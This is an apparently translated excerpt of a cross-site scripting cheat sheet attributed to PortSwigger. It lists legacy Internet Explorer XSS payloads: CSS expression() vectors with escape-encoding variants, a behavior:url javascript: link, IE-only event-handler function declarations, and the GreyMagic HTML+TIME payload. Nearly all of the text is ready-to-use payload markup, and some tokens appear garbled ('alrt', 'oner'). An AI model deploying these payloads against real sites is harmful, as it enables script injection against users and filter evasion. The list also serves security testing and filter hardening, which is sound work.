<div style=xss:expression(alrt( 1 ))> <div style=xss:expression( 1 )-alrt( 1 )> <div style=xss:expressio\6e(alrt( 1 ))> <div style=xss:expressio\006e(alrt( 1 ))> <div style=xss:expressio\00006e(alrt( 1 ))> <div style=xss:expressio\6e(alrt( 1 ))> <div style=xss:expressio& #x5c;6e(alrt(1))> Copy code

In quirks mode, IE allows you to use = instead:

<div style=xss=expression(alrt( 1 ))> <div style= "color=red" >test</div> Copy code

Behavior of IE's older modes

<a style= "behavior:url(#default#AnchorClick);" folder= "javascript:alrt(1)" >XSS</a> Copy code

Event handlers supported in older versions of functions in IE

<script> function window.onload(){ alrt( 1 ); } </script> <script> function window::onload(){ alrt( 1 ); } </script> <script> function win.loc(){ } </script> <body> <script> function/*<img src= 1 oner=alrt( 1 )>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = "<img src=1 oner=alrt(1)>" ;} </script> </body> Copy code

GreyMagic HTML + time exploit (even under 5 docmode, it no longer works)

<HTML><BODY><?xml:namespace prefix= "t" ns= "urn:schemas-microsoft-com:time" ><? import namespace= "t" implementation= "#default#time2" ><t: set attributeName= "innerHTML" to= "XSS<img src=1 oner=alrt(1)>" > </BODY></HTML> Copy code

Original address: portswigger.net/web-securit...